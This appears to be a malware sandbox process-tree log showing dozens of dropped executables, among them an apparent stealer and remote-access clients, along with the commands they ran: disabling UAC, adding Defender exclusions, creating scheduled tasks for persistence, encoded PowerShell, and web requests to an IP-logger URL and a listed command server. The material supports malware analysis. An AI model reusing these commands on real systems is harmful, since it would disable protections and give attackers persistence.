"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=74E83CAAD7F1C611DC9541ECD081DBA7 --mojo-platform-channel-handle=904 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:5560

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:232

C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
3⤵
PID:10136

C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4⤵
PID:9316

C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- Modifies registry key
PID:8764

C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe
"C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe"
4⤵
PID:8528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
5⤵
PID:10920

C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe
C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe
5⤵
PID:10284

C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe
C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe
5⤵
PID:6732

C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
PID:2880

C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
7⤵
- Modifies registry key
PID:10824

C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
3⤵
PID:10096

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
2⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
3⤵
PID:6656

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
3⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
3⤵
PID:7192

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe"
2⤵
PID:1304

C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe
"C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe"
2⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\onzqy.exe
"C:\Users\Admin\AppData\Local\Temp\onzqy.exe" C:\Users\Admin\AppData\Local\Temp\tzehxhtbqdr.f
3⤵
PID:3268

C:\Users\Admin\AppData\Local\Temp\onzqy.exe
"C:\Users\Admin\AppData\Local\Temp\onzqy.exe"
4⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe
"C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe"
2⤵
PID:1932

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundll32.exe
3⤵
- Kills process with taskkill
PID:1240

\??\c:\dan.exe
c:\dan.exe
3⤵
PID:5504

C:\Users\Admin\AppData\Local\Temp\a\build_2.exe
"C:\Users\Admin\AppData\Local\Temp\a\build_2.exe"
2⤵
PID:5484

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
2⤵
PID:1440

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
3⤵
PID:5932

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
3⤵
PID:4128

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
3⤵
PID:2984

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
4⤵
- Creates scheduled task(s)
PID:6436

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
3⤵
PID:2396

C:\Users\Admin\AppData\Local\Temp\a\vbc2.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc2.exe"
2⤵
PID:364

C:\Users\Admin\AppData\Local\Temp\a\vbc3.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc3.exe"
2⤵
PID:6128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:9092

C:\Users\Admin\AppData\Local\Temp\a\vbc4.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc4.exe"
2⤵
PID:5724

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\a\networksec.exe
"C:\Users\Admin\AppData\Local\Temp\a\networksec.exe"
2⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\a\networksec.exe
"C:\Users\Admin\AppData\Local\Temp\a\networksec.exe"
3⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\a\4k4wuzs.exe
"C:\Users\Admin\AppData\Local\Temp\a\4k4wuzs.exe"
2⤵
PID:1500

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:6412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\a\Butterfly_On_Desktop.exe
"C:\Users\Admin\AppData\Local\Temp\a\Butterfly_On_Desktop.exe"
2⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe"
2⤵
PID:6284

C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe
"C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe"
2⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe
"C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe"
3⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
2⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
3⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
2⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
3⤵
PID:8116

C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
2⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
3⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
2⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
3⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
2⤵
PID:6592

C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
3⤵
PID:3596

C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
2⤵
PID:6764

C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
3⤵
PID:8524

C:\Users\Admin\AppData\Local\Temp\a\Uomwqqq.exe
"C:\Users\Admin\AppData\Local\Temp\a\Uomwqqq.exe"
2⤵
PID:7104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
3⤵
PID:6320

C:\Users\Admin\AppData\Local\Temp\a\Uomwqqq.exe
C:\Users\Admin\AppData\Local\Temp\a\Uomwqqq.exe
3⤵
PID:9120

C:\Users\Admin\AppData\Local\Temp\a\InitiativBewerbung.exe
"C:\Users\Admin\AppData\Local\Temp\a\InitiativBewerbung.exe"
2⤵
PID:6168

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dl5em1gw\dl5em1gw.cmdline"
3⤵
PID:7984

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28AC.tmp" "c:\Users\Admin\AppData\Local\Temp\dl5em1gw\CSCCA00626AE18149528F41E44593D5CA91.TMP"
4⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\a\BeeShell.noamsi.exe
"C:\Users\Admin\AppData\Local\Temp\a\BeeShell.noamsi.exe"
2⤵
PID:6392

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxnqkzog\wxnqkzog.cmdline"
3⤵
PID:8148

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES30CA.tmp" "c:\Users\Admin\AppData\Local\Temp\wxnqkzog\CSC1D5FC5D0541249E2BF7DC2958491C199.TMP"
4⤵
PID:8008

C:\Users\Admin\AppData\Local\Temp\a\Gregor_Wolfs.exe
"C:\Users\Admin\AppData\Local\Temp\a\Gregor_Wolfs.exe"
2⤵
PID:6668

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fseg40vi\fseg40vi.cmdline"
3⤵
PID:7736

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54AE.tmp" "c:\Users\Admin\AppData\Local\Temp\fseg40vi\CSC6C47F80EEC124D3BA175E794C72C8541.TMP"
4⤵
PID:6552

C:\Users\Admin\AppData\Local\Temp\a\BeeShell.exe
"C:\Users\Admin\AppData\Local\Temp\a\BeeShell.exe"
2⤵
PID:6596

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pggqm2q2\pggqm2q2.cmdline"
3⤵
PID:7940

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E7F.tmp" "c:\Users\Admin\AppData\Local\Temp\pggqm2q2\CSC9AB7DD722D49F696C5C0403022BC45.TMP"
4⤵
PID:7232

C:\Users\Admin\AppData\Local\Temp\a\Lebenslauf.exe
"C:\Users\Admin\AppData\Local\Temp\a\Lebenslauf.exe"
2⤵
PID:7036

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s5k2zjnn\s5k2zjnn.cmdline"
3⤵
PID:7204

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C6C.tmp" "c:\Users\Admin\AppData\Local\Temp\s5k2zjnn\CSC16E2B5AE198345608B49DC29484EB77B.TMP"
4⤵
PID:6164

C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
2⤵
PID:7076

C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
3⤵
PID:1652

C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
3⤵
PID:7940

C:\Users\Admin\AppData\Local\Temp\a\vbc5.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc5.exe"
2⤵
PID:6780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\JNECrDxSdm.exe"
3⤵
PID:796

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JNECrDxSdm" /XML "C:\Users\Admin\AppData\Local\Temp\tmp11C4.tmp"
3⤵
- Creates scheduled task(s)
PID:9040

C:\Users\Admin\AppData\Local\Temp\a\vbc5.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc5.exe"
3⤵
PID:7328

C:\Users\Admin\AppData\Local\Temp\a\vbc5.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc5.exe"
3⤵
PID:2356

C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe"
2⤵
PID:5112

C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe"
3⤵
PID:6308

C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe"
2⤵
PID:2120

C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe"
3⤵
PID:7436

C:\Users\Admin\AppData\Local\Temp\a\NewM.exe
"C:\Users\Admin\AppData\Local\Temp\a\NewM.exe"
2⤵
PID:5732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $file='C:\Users\Admin\AppData\Local\Temp\a\NewM.exe';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}
3⤵
PID:6656

C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
2⤵
PID:4180

C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
3⤵
PID:7764

C:\Users\Admin\AppData\Local\Temp\a\ghostworker.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghostworker.exe"
2⤵
PID:7264

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "ghostworker.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3⤵
PID:7500

C:\Users\Admin\AppData\Local\Temp\ghostworker.exe
"ghostworker.exe"
4⤵
PID:7948

C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
"Yosdofwiqay.exe"
4⤵
PID:5792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4⤵
PID:3772

C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe
"C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe"
2⤵
PID:7520

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3⤵
PID:7968

C:\Users\Admin\AppData\Local\Temp\Togwcstgxg.exe
"Togwcstgxg.exe"
4⤵
PID:6972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
5⤵
PID:1372

C:\Users\Admin\AppData\Local\Temp\Togwcstgxg.exe
C:\Users\Admin\AppData\Local\Temp\Togwcstgxg.exe
5⤵
PID:10068

C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
"Yosdofwiqay.exe"
4⤵
PID:5992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\a\Prynt_Stealer_5.6.exe
"C:\Users\Admin\AppData\Local\Temp\a\Prynt_Stealer_5.6.exe"
2⤵
PID:7872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7872 -s 1028
3⤵
- Program crash
PID:7336

C:\Users\Admin\AppData\Local\Temp\a\virus.exe
"C:\Users\Admin\AppData\Local\Temp\a\virus.exe"
2⤵
PID:8172

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "build.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3⤵
PID:7540

C:\Users\Admin\AppData\Local\Temp\build.exe
"build.exe"
4⤵
PID:5204

C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
"Yosdofwiqay.exe"
4⤵
PID:5452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4⤵
PID:7776

C:\Users\Admin\AppData\Local\Temp\a\Installs.exe
"C:\Users\Admin\AppData\Local\Temp\a\Installs.exe"
2⤵
PID:7372

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE
3⤵
PID:7560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
4⤵
PID:8792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
5⤵
PID:8400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
4⤵
PID:2932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
5⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\a\hastly.exe
"C:\Users\Admin\AppData\Local\Temp\a\hastly.exe"
2⤵
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 616
3⤵
- Program crash
PID:6980

C:\Users\Admin\AppData\Local\Temp\a\Output.exe
"C:\Users\Admin\AppData\Local\Temp\a\Output.exe"
2⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\a\ts.exe
"C:\Users\Admin\AppData\Local\Temp\a\ts.exe"
2⤵
PID:4684

C:\Users\Admin\AppData\Local\Temp\a\My2.exe
"C:\Users\Admin\AppData\Local\Temp\a\My2.exe"
2⤵
PID:7412

C:\Users\Admin\AppData\Local\Temp\a\secbobbyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secbobbyzx.exe"
2⤵
PID:9100

C:\Users\Admin\AppData\Local\Temp\wfwvuws.exe
"C:\Users\Admin\AppData\Local\Temp\wfwvuws.exe" C:\Users\Admin\AppData\Local\Temp\wammagdq.lpz
3⤵
PID:6492

C:\Users\Admin\AppData\Local\Temp\a\s2s.exe
"C:\Users\Admin\AppData\Local\Temp\a\s2s.exe"
2⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 1020
3⤵
- Program crash
PID:7184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 1028
3⤵
- Program crash
PID:9076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 984
3⤵
- Program crash
PID:9604

C:\Windows\syswow64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
3⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\a\Acx_w01.exe
"C:\Users\Admin\AppData\Local\Temp\a\Acx_w01.exe"
2⤵
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7z961A0CA8\Files\setup.bat" "
3⤵
PID:6152

C:\Windows\system32\regsvr32.exe
regsvr32 ./Files/Amox.dll /s
4⤵
PID:8852

C:\Users\Admin\AppData\Local\Temp\a\001.exe
"C:\Users\Admin\AppData\Local\Temp\a\001.exe"
2⤵
PID:8916

C:\Users\Admin\AppData\Local\Temp\a\FL2.exe
"C:\Users\Admin\AppData\Local\Temp\a\FL2.exe"
2⤵
PID:8596

C:\Users\Admin\AppData\Local\Temp\is-3S3MV.tmp\FL2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3S3MV.tmp\FL2.tmp" /SL5="$10500,140518,56832,C:\Users\Admin\AppData\Local\Temp\a\FL2.exe"
3⤵
PID:8648

C:\Users\Admin\AppData\Local\Temp\is-JADJD.tmp\zilenski.exe
"C:\Users\Admin\AppData\Local\Temp\is-JADJD.tmp\zilenski.exe" /S /UID=flabs1
4⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\a\tonyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tonyzx.exe"
2⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\a\tonyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tonyzx.exe"
3⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\a\ohoyec.exe
"C:\Users\Admin\AppData\Local\Temp\a\ohoyec.exe"
2⤵
PID:712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /release
3⤵
PID:9740

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:5140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
3⤵
PID:10064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /renew
3⤵
PID:6184

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
4⤵
- Gathers network information
PID:9276

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
3⤵
PID:9296

C:\Users\Admin\AppData\Local\Temp\a\zj.exe
"C:\Users\Admin\AppData\Local\Temp\a\zj.exe"
2⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\a\LfhxrETRRGxerZerexgfCtex.exe
"C:\Users\Admin\AppData\Local\Temp\a\LfhxrETRRGxerZerexgfCtex.exe"
2⤵
PID:2968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:9488

C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt1.exe"
2⤵
PID:6200

C:\Users\Admin\AppData\Local\Temp\a\atlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\atlaszx.exe"
2⤵
PID:9420

C:\Users\Admin\AppData\Local\Temp\a\atlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\atlaszx.exe"
3⤵
PID:10576

C:\Users\Admin\AppData\Local\Temp\a\123.exe
"C:\Users\Admin\AppData\Local\Temp\a\123.exe"
2⤵
PID:9524

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:9336

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
3⤵
PID:8896

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
3⤵
PID:6648

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
3⤵
PID:9980

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:9484

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:9032

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
3⤵
PID:9408

C:\Users\Admin\AppData\Local\Temp\a\asdsada.exe
"C:\Users\Admin\AppData\Local\Temp\a\asdsada.exe"
2⤵
PID:9900

C:\Users\Admin\AppData\Local\Temp\a\GamingBooster.exe
"C:\Users\Admin\AppData\Local\Temp\a\GamingBooster.exe"
2⤵
PID:10104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAyAA==
3⤵
PID:8156

C:\Users\Admin\AppData\Local\Temp\a\GamingBooster.exe
C:\Users\Admin\AppData\Local\Temp\a\GamingBooster.exe
3⤵
PID:4004

